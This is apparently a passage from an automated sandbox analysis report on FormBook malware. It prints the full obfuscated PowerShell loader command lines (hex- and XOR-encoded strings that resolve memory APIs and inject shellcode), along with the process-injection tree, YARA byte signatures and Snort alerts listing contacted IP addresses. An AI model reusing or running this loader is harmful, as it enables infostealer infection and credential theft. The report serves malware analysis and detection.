St'raBTr3FjCKr4AnFDoAUnFSg2HjESi5YaETa3inFSk2KoEPa4TeEUn3MoFDiETuFStBLaFAkBBeFSp2LuFAn9DuFRe3InFza2HaEDi4RgABa4SoBSt7BaASpAPsBVi7PaBMi3MiDFj6KoEAb2AgEIs3stFDi8CyFEjBImEBiEDiEFo3BnFhoENoFSe4CoBSm9doDTaECrFCa9AlETh1OvFLe8meFInCDuFMa2VeBDaFEfCOvCHeDHaEEkFSt9ScECe3UsCSa7HeESu3FrENe5LaCGlAGrAMnDUnAPoDBeCheDFuFBi2SoEfe5stFTi8HuBInBFrBSe7SlAUn1ToABo2AfALeEBoBApBFdBFr7ChAHo7InEMeFSkAFi4BeAVr7trAEn7IsAMi7PaBReBChBDy7UnACo7FoENoFDeANe3HuARa7KoBFiEGi'Lo;Re&De(Sy`$OpDVouSenJicOp7Mi)Co St`$FoSClkGeuFerTjvOpsEv7Mo;Ui`$BnSNykPeunarDavFrsEr8To Pi=Un ChSUnpNoiHenKadOmeSurSaoKnkFasSh0Se Ar'GnBSu3piDjuCPiFUsBHaERa2DoFBu9UnFcoCOrFSt2SkEBo5quFNo9AfFSt2ExBGe7MeASmAMoBLi7TiBEk3thDga6SsEKa2UnEUh3TrFHa8BjFNoBDeEOlECiEBl3BeFAnEMaFEs4StBUd9DiDReEAnFSe9VaERe1PoFKj8AnFsuCRiFAf2AcBFiFinCJoCIoDanEUdFAr9PaESu3ReCGr7FeEZi3DeEOp5AdCAfAPrAKlDExACiDFlCOpDHuFPa2NyEPl5PlFPh8BoBNeBSaBUn7FlAFo5SkAMa1SlAno4FlAPe6PyAMe1UdABuFRyAEl7CoABl7VaBStBEpBSo7CoAwa7CeEPaFLaAAn4ReAWe7MaAbe7ctAJu7TrBnoBAfBBo7GlAco7ScERiFElARi3ShBKrEre'Op;Co&Ra(Sn`$RoDSouExnAccQu7ma)Ra Wo`$ZoSFukNauWerMuvsosFi8Mi;Fr`$ErSEpmOveRerFitCleblsVitPeiTelMolAneRunTrdReeCasVe0Ba0Ou=En'TrHChKGoCAnUUn:Be\HiBspeEufDaaLimSalPheBa\SuBDeeFosFakDeaCerCo'Co;Br`$NoSUbmVaeVerGrtFleTosBltObiBelEalBaeAfncydDaeScsSp0Fi1Sv An=TiSHepSyiDenKadNoeBorBloTakCasRe0Op St'InBSu3PaDLuANoFRa2FoFEn3SyFFl2ExFDu6TrASnADeBImFSkDKl0BaFCr2piETa3PaBReAstDApEBoEFo3GeFre2SnFMaAHeCBe7SvEFe5PeFSt8SiEEu7ScFUn2FiEUd5HaEOp3FiElyEBrBTy7HyBLoAGeCIn7PaFAn6AsEPr3CaFDoFAnBMe7StBAu3AfCSu4LaFLuAPaFAg2HyEOv5NoEjo3UlFSo2NoEpa4MaEBa3ChFAnETrFUnBKvFUnBfiFov2AbFRa9prFAl3PrFJo2AfEDa4grAHv7BnAGr7DaBGlECaBme9PrCAv4TeFVe2SeEAn5FrFsi0HyFTr2Or'Th;Ma&Fr(Fl`$LuDCluRanCacLe7Gr)De Bo`$UdSDemBiecerIltUnePhsShtOviHvlHelViePhnUddSkeAvssp0Ki1sk;Hu`$AgSObkBauGirEvvposMi9Em ne=Br BoSLepRoiRenKadTeeklrExoMokCosGa0In Un'DaBSp3RoCMa4CeFMaCHoEPe2SnEIn5InEOm1UnEOx4AfBVa7CaAskAdaBBe7PlCReCfoCSu4UdEVoEUaETr4SpEOd3ElFLa2UnFTrALaBXv9OsDUd4EcFGr8CoFse9GrESt1WhFKr2ToESk5AdEHy3LeCPrADiADuDFoAReDDeDSa1InEPa5UnFGr8AuFTrADiDUd5OdFKo6WaEUd4ReFSm2thALi1FrAJe3PoCDi4AvEGr3KiEIn5MiFKoEAlFte9StFJo0GaBSpFBeBSt3PaDReAUnFDr2MaFMi3PrFEk2OvFUn6PrBBeEPy'Ka;Ka&Al(Ra`$EpDKouSknChcLn7Ci)ef Br`$FaSAdkSpudurTyvOvsOs9Bo;Wa`$EnMWaeDodNoeMaaDr0Cl Li=Dr EnSMipPrinenKodKoeSkrDrourkNosTe0Ch Le'CoCAfCReCUn4viEPrEKoESk4GiENe3BrFMi2CiFSkAKuBDo9UnCBr5PlENe2ReFFe9BrEPa3GiFBeENeFhaATrFRe2AfBBr9ReDWaETuFRo9GaELe3BiFSt2StEBa5BrFpa8ClEBu7BiCIn4ByFPh2MiEOs5AdEFi1DeFFaEKoFEl4HeFRe2TeEMy4MaBPl9UkDDkAYeFBa6ReEBe5BrECe4IdFNaFdeFTr6HuFBiBMiCReAArASuDTeALaDKaDml4BrFSc8ChEch7noELiEkaBOvFMaBAx3ToCfl4SlFteCSeEOv2RuEDe5HaEst1KrESe4MeBsuBKeBtr7geAel7CyBOxBPrBSc7OvBEx7FoBSv3KuCEl4DeFGeAViFbu2MuEAm5PyEDi3GeFDe2DeEFi4JaEek3LrFCoEAnFLeBAcFHeBBeFCu2AsFSt9FeFca3RdFFi2GeETh4AnAAg4FlBAdBNeBSe7KoAgo1StAKo2HyAKlEDiBStEMy'Hy;fe&Nr(Be`$SlDpruUnnDecPr7Ro)Ma Ko`$PiMAneGedReeFoaPl0Br;Na`$DyGBrlTaoRerSiicufOniUnePorDesLe=Pr`$CoSGekFouTerSkvPlsal.KacaaosauKonQutCa-ju6ce5re9Af;Wh`$anMPeeSvdBaetuaPa1Ba tu=Bl MiSSkpUniKenKodvieadrTroVakAgsFo0Ch Me'BeCClCGaCGt4eiERoEReEFo4KuEBe3FrFUn2RaFStABoBHy9ClCga5BeEEm2RuFsi9DeESy3SuFAuEMeFMaALyFKu2acBFa9UrDpaEBuFAn9JuEUd3StFla2PhEpr5alFNa8CuESh7ulCDe4LaFBi2BeESe5DeEba1UnFCoEScFPr4PrFSk2CiESi4roBVe9BrDBiALuFBy6SaEEx5GiEmi4UpFAfFHyFDe6CuFPyBBrCAnABoASaDInACaDSuDNo4ShFOp8AnEBe7LiEseEFeBBaFsaBHa3UnCDe4AfFUnCHjERo2CoEMi5DvEPo1VaEOr4AmBNeBThBsa7YoAun1ydASc2LyASoERrBBuBOrBDi7KeBRe3CoDSkCFoFUdBGoECo2UmFAf9UmFPhCAfFMe2KuELi5GdFby9HoFJu2TiBMaBFaBCh7EsBOe3BeDne0EuFCaBMoFRu8ApESk5KlFaaESiFkv1SmFCoEEnFBe2TrEVi5MiEMe4EnBSkESi'Sk;Br&Ar(Ta`$StDEduInnJicSt7At)Ba Sk`$IdMuneJudAveAfaRy1Pa;Fo`$MeMSaemodSvemoaaf2cu Ou=Ko SpSEcpPoidonPydRoeAcrCaoPakDysbe0Af Ov'ZoBTr3CaFSt6TuFby1BlFTy3FuFEm2CoFTrBHeFMoEFaFMa9FeFOp0BeERa4RoFklEFjFKs9ScFMe0InFag2TrFVe9LaFHeEKaENa5OvFDe2JoEWi5uuFNe9JuFbe2DyBSv7ReASpASpBGr7BlCFlCKoCIn4GuEDyEkuEWi4JuEIn3KnFVe2MaFJoAFoBvk9toCFr5ObEOc2EmFIn9deETr3StFPaEPaFBjAStFSp2HaBov9seDMiEDuFBa9FlEFn3SoFUn2ThEPr5DeFMk8PsESa7UdCMy4UnFEs2DiEMy5GnEAk1MiFSkEInFKa4TaFHj2GoEGy4FoBUd9NoDudABoFOv6SkEEk5OrEKi4CoFToFImFSu6DoFFyBHaCAsAslAAuDTeAMeDSpDSu0TaFSe2ReELo3VaDNo3DeFre2WaFScBRrFBr2TjFFa0EnFIn6UnEOx3BeFLv2MuDGe1PeFTv8prEUn5tiDVi1TuEEp2ReFCr9SpFDu4ReEMr3baFStEAoFTr8PyFAn9ArCHa7JeFCh8PoFPrEKaFHe9SlETa3GeFMe2PrERe5BuBOnFDiBInFAfFAw1SwFapCVeEOb7SiBKr7seBDy3RuCFe2DwFSu3AmFHyACiESt2AmFFr9MaFGu3trFApEBrFTr9PrFFr0BeFun2ArESt5BeEHo4OrBNe7DiBRo3stDPrESeFKa9UnEWa3UnFTr2DaEop5LoFBj4FyFOc2TvEJo4FoEIl4cyFOpEseFBo8BlFSk9FyEde4ReBjuEBlBUnBheBBj7RoBMoFMuDko0MiDBa3beCKv3MuBPo7ReDRe7KoBCoFTrCSeCBaDKoEGrFHi9FlEGe3AlCFo7faEKa3MiEMa5AcCUdAGaBSiBLnBNe7keCNrCseDunEPoFSp9QuEFo3AdCPr7HeEUs3UnESk5teCMaABiBNiBReBSa7SeCzeCBeDTaEAnFIr9FyEKr3UoCFl7BeESk3CaESm5CaCKoAdeBJaBMaBFo7PrCBeCArDReEDuFBe9SaEBe3MiCEl7PaETo3LnEBa5UnCNoAGyBCoBHeBKb7MoCInCHiDHaEDeFMa9FiEHj3unCEc7ArESk3KlEFe5LoCCaAFeBBrEAuBLi7KoBAfFZaCMaCSiDPaEKlFBa9plEBl3PrCFr7CaELi3EnEBa5LeCPiAnaBSlEBaBShEDaBJeENe'pr;As&St(Li`$AkDCouAtnexcRe7ha)Un pi`$MaMVieMedtreOxaHl2Me;Ba`$ViMSpeChdTreNoaMa3Ba Tu=Ga DaSVrpChiAnnRedUneTarProPakOpsWi0Ha Ma'feBRe3CaFSk6UnFEl1DeFAe3BuFFo2StFPeBVlFVoEBeFjo9KeFXi0PoEUn4PyFPlEUiFAn9teFAn0ScFRe2TiFNo9MeFSpEEpEFa5OpFCu2DoEBa5SpFRe9SpFAn2FoBpr9AnDEpEHaFDc9NoESu1OpFBe8KrFUdCstFWh2RdBVeFBrBBi3MoCLi4AkFSuAMiFAn2AtEAs5AnESk3OfFSv2SeEBe4unEPa3GoFWiEHoFBeBBrFToBSmFSn2FrFGe9OvFSl3OpFBe2DoEPo4LaAKa4HeBhuBHuBpu3ScDDeCPuFHuBTiESo2LnFDi9HoFDoCInFPe2BiESk5KlFSr9ApFor2CoBFrBDrBKo3PuDOm6ShFDs4NaFVeFHoFSa6DrERy3BeFSl2PyBEvBLdACo7HuBPeBHeAAf7UnBReEBl'Ca;Ta&La(No`$DiDKruPonRwcNo7An)Ne Ca`$UnMPreJidKaeHjaTe3Ey#Ab;""";;Function Medea9 { param([String]$Anthroposcopy); For($Tractility=2; $Tractility -lt $Anthroposcopy.Length-1; $Tractility+=(2+1)){ $Spinderoks = $Spinderoks + $Anthroposcopy.Substring($Tractility, 1); } $Spinderoks;}$Temperaturforskellen0 = Medea9 'Na Su Kv Hr To Co An Ra Ka En Gi Fo Pr Vr Hi St Bl Un Ti Ca Pr Ch Ve NeIStEFoXFi ';$Temperaturforskellen1= Medea9 $nonreliableness;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Temperaturforskellen1 ;}else{.$Temperaturforskellen0 $Temperaturforskellen1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Spinderoks0 { param([String]$Anthroposcopy); $Kanuri = New-Object byte[] ($Anthroposcopy.Length / 2); For($Tractility=0; $Tractility -lt $Anthroposcopy.Length; $Tractility+=2){ $Barbarous = $Anthroposcopy.Substring($Tractility, 2); $Kanuri[$Tractility/2] = [convert]::ToByte($Barbarous, 16); $Kanuri[$Tractility/2] = ($Kanuri[$Tractility/2] -bxor 151); } [String][System.Text.Encoding]::ASCII.GetString($Kanuri);}$Magnale270=Spinderoks0 'C4EEE4E3F2FAB9F3FBFB';$Magnale271=Spinderoks0 'DAFEF4E5F8E4F8F1E3B9C0FEF9A4A5B9C2F9E4F6F1F2D9F6E3FEE1F2DAF2E3FFF8F3E4';$Magnale272=Spinderoks0 'D0F2E3C7E5F8F4D6F3F3E5F2E4E4';$Magnale273=Spinderoks0 'C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1';$Magnale274=Spinderoks0 'E4E3E5FEF9F0';$Magnale275=Spinderoks0 'D0F2E3DAF8F3E2FBF2DFF6F9F3FBF2';$Magnale276=Spinderoks0 'C5C3C4E7F2F4FEF6FBD9F6FAF2BBB7DFFEF3F2D5EEC4FEF0BBB7C7E2F5FBFEF4';$Magnale277=Spinderoks0 'C5E2F9E3FEFAF2BBB7DAF6F9F6F0F2F3';$Magnale278=Spinderoks0 'C5F2F1FBF2F4E3F2F3D3F2FBF2F0F6E3F2';$Magnale279=Spinderoks0 'DEF9DAF2FAF8E5EEDAF8F3E2FBF2';$Dunc0=Spinderoks0 'DAEED3F2FBF2F0F6E3F2C3EEE7F2';$Dunc1=Spinderoks0 'D4FBF6E4E4BBB7C7E2F5FBFEF4BBB7C4F2F6FBF2F3BBB7D6F9E4FED4FBF6E4E4BBB7D6E2E3F8D4FBF6E4E4';$Dunc2=Spinderoks0 'DEF9E1F8FCF2';$Dunc3=Spinderoks0 'C7E2F5FBFEF4BBB7DFFEF3F2D5EEC4FEF0BBB7D9F2E0C4FBF8E3BBB7C1FEE5E3E2F6FB';$Dunc4=Spinderoks0 'C1FEE5E3E2F6FBD6FBFBF8F4';$Dunc5=Spinderoks0 'F9E3F3FBFB';$Dunc6=Spinderoks0 'D9E3C7E5F8E3F2F4E3C1FEE5E3E2F6FBDAF2FAF8E5EE';$Dunc7=Spinderoks0 'DED2CF';$Dunc8=Spinderoks0 'CB';$Udmundingers=Spinderoks0 'C2C4D2C5A4A5';$Intercessions=Spinderoks0 'D4F6FBFBC0FEF9F3F8E0C7E5F8F4D6';function fkp {Param ($Opringningernes, $Introsuction) ;$Skurvs0 =Spinderoks0 'B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B7AAB7BFCCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D0F2E3D6E4E4F2FAF5FBFEF2E4BFBEB7EBB7C0FFF2E5F2BAD8F5FDF2F4E3B7ECB7B3C8B9D0FBF8F5F6FBD6E4E4F2FAF5FBEED4F6F4FFF2B7BAD6F9F3B7B3C8B9DBF8F4F6E3FEF8F9B9C4E7FBFEE3BFB3D3E2F9F4AFBECCBAA6CAB9D2E6E2F6FBE4BFB3DAF6F0F9F6FBF2A5A0A7BEB7EABEB9D0F2E3C3EEE7F2BFB3DAF6F0F9F6FBF2A5A0A6BE';&($Dunc7) $Skurvs0;$Skurvs5 = Spinderoks0 'B3D2EFF4FBE2E4FEF8F9FEE4FAB7AAB7B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A5BBB7CCC3EEE7F2CCCACAB7D7BFB3DAF6F0F9F6FBF2A5A0A4BBB7B3DAF6F0F9F6FBF2A5A0A3BEBE';&($Dunc7) $Skurvs5;$Skurvs1 = Spinderoks0 'E5F2E3E2E5F9B7B3D2EFF4FBE2E4FEF8F9FEE4FAB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFCCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1CABFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1BFBFD9F2E0BAD8F5FDF2F4E3B7DEF9E3C7E3E5BEBBB7BFB3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A2BEBEB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFB3D8E7E5FEF9F0F9FEF9F0F2E5F9F2E4BEBEBEBEBBB7B3DEF9E3E5F8E4E2F4E3FEF8F9BEBE';&($Dunc7) $Skurvs1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Hidfres,[Parameter(Position = 1)] [Type] $belastningsprvens = [Void]);$Skurvs2 = Spinderoks0 'B3DAF8E5E7FFFEF4B7AAB7CCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D3F2F1FEF9F2D3EEF9F6FAFEF4D6E4E4F2FAF5FBEEBFBFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D6E4E4F2FAF5FBEED9F6FAF2BFB3DAF6F0F9F6FBF2A5A0AFBEBEBBB7CCC4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D2FAFEE3B9D6E4E4F2FAF5FBEED5E2FEFBF3F2E5D6F4F4F2E4E4CAADADC5E2F9BEB9D3F2F1FEF9F2D3EEF9F6FAFEF4DAF8F3E2FBF2BFB3DAF6F0F9F6FBF2A5A0AEBBB7B3F1F6FBE4F2BEB9D3F2F1FEF9F2C3EEE7F2BFB3D3E2F9F4A7BBB7B3D3E2F9F4A6BBB7CCC4EEE4E3F2FAB9DAE2FBE3FEF4F6E4E3D3F2FBF2F0F6E3F2CABE';&($Dunc7) $Skurvs2;$Skurvs3 = Spinderoks0 'B3DAF8E5E7FFFEF4B9D3F2F1FEF9F2D4F8F9E4E3E5E2F4E3F8E5BFB3DAF6F0F9F6FBF2A5A0A1BBB7CCC4EEE4E3F2FAB9C5F2F1FBF2F4E3FEF8F9B9D4F6FBFBFEF9F0D4F8F9E1F2F9E3FEF8F9E4CAADADC4E3F6F9F3F6E5F3BBB7B3DFFEF3F1E5F2E4BEB9C4F2E3DEFAE7FBF2FAF2F9E3F6E3FEF8F9D1FBF6F0E4BFB3DAF6F0F9F6FBF2A5A0A0BE';&($Dunc7) $Skurvs3;$Skurvs4 = Spinderoks0 'B3DAF8E5E7FFFEF4B9D3F2F1FEF9F2DAF2E3FFF8F3BFB3D3E2F9F4A5BBB7B3D3E2F9F4A4BBB7B3F5F2FBF6E4E3F9FEF9F0E4E7E5E1F2F9E4BBB7B3DFFEF3F1E5F2E4BEB9C4F2E3DEFAE7FBF2FAF2F9E3F6E3FEF8F9D1FBF6F0E4BFB3DAF6F0F9F6FBF2A5A0A0BE';&($Dunc7) $Skurvs4;$Skurvs5 = Spinderoks0 'E5F2E3E2E5F9B7B3DAF8E5E7FFFEF4B9D4E5F2F6E3F2C3EEE7F2BFBE';&($Dunc7) $Skurvs5 ;}$Diagonallse231 = Spinderoks0 'FCF2E5F9F2FBA4A5';$Skurvs6 = Spinderoks0 'B3D6E2E3F8FBEEE3FEF4B7AAB7CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD0F2E3D3F2FBF2F0F6E3F2D1F8E5D1E2F9F4E3FEF8F9C7F8FEF9E3F2E5BFBFF1FCE7B7B3D3FEF6F0F8F9F6FBFBE4F2A5A4A6B7B3D3E2F9F4A3BEBBB7BFD0D3C3B7D7BFCCDEF9E3C7E3E5CABBB7CCC2DEF9E3A4A5CABBB7CCC2DEF9E3A4A5CABBB7CCC2DEF9E3A4A5CABEB7BFCCDEF9E3C7E3E5CABEBEBE';&($Dunc7) $Skurvs6;$Achate = fkp $Dunc5 $Dunc6;$Skurvs7 = Spinderoks0 'B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4B7AAB7B3D6E2E3F8FBEEE3FEF4B9DEF9E1F8FCF2BFCCDEF9E3C7E3E5CAADADCDF2E5F8BBB7A1A2AEBBB7A7EFA4A7A7A7BBB7A7EFA3A7BE';&($Dunc7) $Skurvs7;$Skurvs8 = Spinderoks0 'B3DCFBE2F9FCF2E5F9F2B7AAB7B3D6E2E3F8FBEEE3FEF4B9DEF9E1F8FCF2BFCCDEF9E3C7E3E5CAADADCDF2E5F8BBB7A5A1A4A6A1AFA7A7BBB7A7EFA4A7A7A7BBB7A7EFA3BE';&($Dunc7) $Skurvs8;$Smertestillendes00='HKCU:\Befamle\Beskar';$Smertestillendes01 =Spinderoks0 'B3DAF2F3F2F6AABFD0F2E3BADEE3F2FAC7E5F8E7F2E5E3EEB7BAC7F6E3FFB7B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A7A7BEB9C4F2E5F0F2';&($Dunc7) $Smertestillendes01;$Skurvs9 = Spinderoks0 'B3C4FCE2E5E1E4B7AAB7CCC4EEE4E3F2FAB9D4F8F9E1F2E5E3CAADADD1E5F8FAD5F6E4F2A1A3C4E3E5FEF9F0BFB3DAF2F3F2F6BE';&($Dunc7) $Skurvs9;$Medea0 = Spinderoks0 'CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD4F8E7EEBFB3C4FCE2E5E1E4BBB7A7BBB7B7B3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4BBB7A1A2AEBE';&($Dunc7) $Medea0;$Glorifiers=$Skurvs.count-659;$Medea1 = Spinderoks0 'CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD4F8E7EEBFB3C4FCE2E5E1E4BBB7A1A2AEBBB7B3DCFBE2F9FCF2E5F9F2BBB7B3D0FBF8E5FEF1FEF2E5E4BE';&($Dunc7) $Medea1;$Medea2 = Spinderoks0 'B3F6F1F3F2FBFEF9F0E4FEF9F0F2F9FEE5F2E5F9F2B7AAB7CCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DAF6E5E4FFF6FBCAADADD0F2E3D3F2FBF2F0F6E3F2D1F8E5D1E2F9F4E3FEF8F9C7F8FEF9E3F2E5BFBFF1FCE7B7B3C2F3FAE2F9F3FEF9F0F2E5E4B7B3DEF9E3F2E5F4F2E4E4FEF8F9E4BEBBB7BFD0D3C3B7D7BFCCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABBB7CCDEF9E3C7E3E5CABEB7BFCCDEF9E3C7E3E5CABEBEBE';&($Dunc7) $Medea2;$Medea3 = Spinderoks0 'B3F6F1F3F2FBFEF9F0E4FEF9F0F2F9FEE5F2E5F9F2B9DEF9E1F8FCF2BFB3C4FAF2E5E3F2E4E3FEFBFBF2F9F3F2E4A4BBB3DCFBE2F9FCF2E5F9F2BBB3D6F4FFF6E3F2BBA7BBA7BE';&($Dunc7) $Medea3# MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • ieinstal.exe (PID: 6684 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 6644 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 6636 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 6688 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 1500 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 1464 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 1264 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 1300 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 1320 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 2576 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 3044 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ielowutil.exe (PID: 8884 cmdline: C:\Program Files (x86)\internet explorer\ielowutil.exe MD5: 650FE7460630188008BF8C8153526CEB)
          • explorer.exe (PID: 4864 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
            • chkdsk.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
              • firefox.exe (PID: 4496 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
                • WerFault.exe (PID: 8168 cmdline: C:\Windows\system32\WerFault.exe -u -p 4496 -s 284 MD5: 5C06542FED8EE68994D43938E7326D75)
            • ielowutil.exe (PID: 7392 cmdline: "C:\Program Files (x86)\internet explorer\ielowutil.exe" MD5: 650FE7460630188008BF8C8153526CEB)
            • ielowutil.exe (PID: 3176 cmdline: "C:\Program Files (x86)\internet explorer\ielowutil.exe" MD5: 650FE7460630188008BF8C8153526CEB)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18055:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17af1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18157:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18257:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x18055:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17af1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x18157:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x182cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa9da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.20185.215.4.3649840802031453 02/13/23-18:59:45.026565
      SID:2031453
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.215.4.3649840802031412 02/13/23-18:59:45.026565
      SID:2031412
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049851802031453 02/13/23-19:00:34.698267
      SID:2031453
      Source Port:49851
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20208.91.197.9149875802031412 02/13/23-19:01:51.132485
      SID:2031412
      Source Port:49875
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20147.92.47.18249888802031412 02/13/23-19:02:32.963635
      SID:2031412
      Source Port:49888
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20208.91.197.9149875802031453 02/13/23-19:01:51.132485
      SID:2031453
      Source Port:49875
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049851802031412 02/13/23-19:00:34.698267
      SID:2031412
      Source Port:49851
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20147.92.47.18249888802031453 02/13/23-19:02:32.963635
      SID:2031453
      Source Port:49888
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049916802031453 02/13/23-19:05:19.753523
      SID:2031453
